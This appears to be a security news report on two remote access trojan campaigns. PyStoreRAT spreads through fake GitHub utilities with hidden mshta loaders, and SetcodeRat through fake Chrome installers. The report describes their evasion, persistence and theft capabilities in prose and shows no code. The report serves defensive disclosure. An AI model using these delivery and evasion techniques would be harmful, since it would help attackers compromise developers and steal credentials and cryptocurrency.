Cybersecurity researchers are calling attention to a new campaign that’s leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT.
“These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing it via ‘mshta.exe,'” Morphisec researcher Yonatan Edri said in a report shared with The Hacker News.
PyStoreRAT has been described as a “modular, multi-stage” implant that can execute EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. The malware also deploys an information stealer known as Rhadamanthys as a follow-on payload.
Attack chains involve distributing the malware through Python or JavaScript loader stubs embedded in GitHub repositories masquerading as OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities that are designed to appeal to analysts and developers.
The earliest signs of the campaign go back to mid-June 2025, with a steady stream of “repositories” published since then. The tools are promoted via social media platforms like YouTube and X, as well as artificially inflate the repositories’ star and fork metrics – a technique reminiscent of the Stargazers Ghost Network.
The threat actors behind the campaign leverage either newly created GitHub accounts or those that lay dormant for months to publish the repositories, stealthily slipping the malicious payload in the form of “maintenance” commits in October and November after the tools began to gain popularity and landed on GitHub’s top trending lists.
In fact, many of the tools did not function as they were advertised, only displaying static menus or non-interactive interfaces in some cases, while others performed minimal placeholder operations. The intention behind the operation was to lend them a veneer of legitimacy by abusing GitHub’s inherent trust and deceiving users into executing the loader stub that’s responsible for initiating the infection chain.
This effectively triggers the execution of a remote HTML Application (HTA) payload that, in turn, delivers the PyStoreRAT malware, which comes with capabilities to profile the system, check for administrator privileges, and scan the system for cryptocurrency wallet-related files, specifically those associated with Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02.
The loader stub gathers a list of installed antivirus products and check strings matching “Falcon” (a reference to CrowdStrike Falcon) or “Reason” (a reference to Cybereason or ReasonLabs) likely in an attempt to reduce visibility. In the event they are detected, it launches “mshta.exe” by means of “cmd.exe.” Otherwise, it proceeds with direct “mshta.exe” execution.
Persistence is achieved by setting up a scheduled task that’s disguised as an NVIDIA app self-update. In the final stage, the malware contacts an external server to fetch commands to be executed on the host. Some of the supported commands are listed below –
- Download and execute EXE payloads, including Rhadamanthys
- Download and extract ZIP archives
- Downloads a malicious DLL and executes it using “rundll32.exe”
- Fetch raw JavaScript code and execute it dynamically in memory using eval()
- Download and install MSI packages
- Spawn a secondary “mshta.exe” process to load additional remote HTA payloads
- Execute PowerShell commands directly in memory
- Spread via removable drives by replacing legitimate documents with malicious Windows Shortcut (LNK) files
- Delete the scheduled task to remove the forensic trail
It’s currently not known who is behind the operation, but the presence of Russian-language artifacts and coding patterns alludes to a threat actor of likely Eastern European origin, Morphisec said.
“PyStoreRAT represents a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats,” Edri concluded. “Its use of HTA/JS for execution, Python loaders for delivery, and Falcon-aware evasion logic creates a stealthy first-stage foothold that traditional EDR solutions detect only late in the infection chain.”
The disclosure comes as Chinese security vendor QiAnXin detailed another new remote access trojan (RAT) codenamed SetcodeRat that’s likely being propagated across the country since October 2025 via malvertising lures. Hundreds of computers, including those belonging to governments and enterprises, are said to have been infected in a span of one month.
“The malicious installation package will first verify the region of the victim,” the QiAnXin Threat Intelligence Center said. “If it is not in the Chinese-speaking area, it will automatically exit.”
The malware is disguised as legitimate installers for popular programs like Google Chrome and proceeds to the next stage only if the system language corresponds to Mainland China (Zh-CN), Hong Kong (Zh-HK), Macao (Zh-MO), and Taiwan (Zh-TW). It also terminates the execution if a connection to a Bilibili URL (“api.bilibili[.]com/x/report/click/now”) is unsuccessful.
In the next stage, an executable named “pnm2png.exe” is launched to sideload “zlib1.dll,” which then decrypts the contents of a file called “qt.conf” and runs it. The decrypted payload is a DLL that embeds the RAT payload. SetcodeRat can either connect to Telegram or a conventional command-and-control (C2) server to retrieve instructions and carry out data theft.
It enables the malware to take screenshots, log keystrokes, read folders, set folders, start processes, run “cmd.exe,” set socket connections, collect system and network connection information, update itself to a new version.
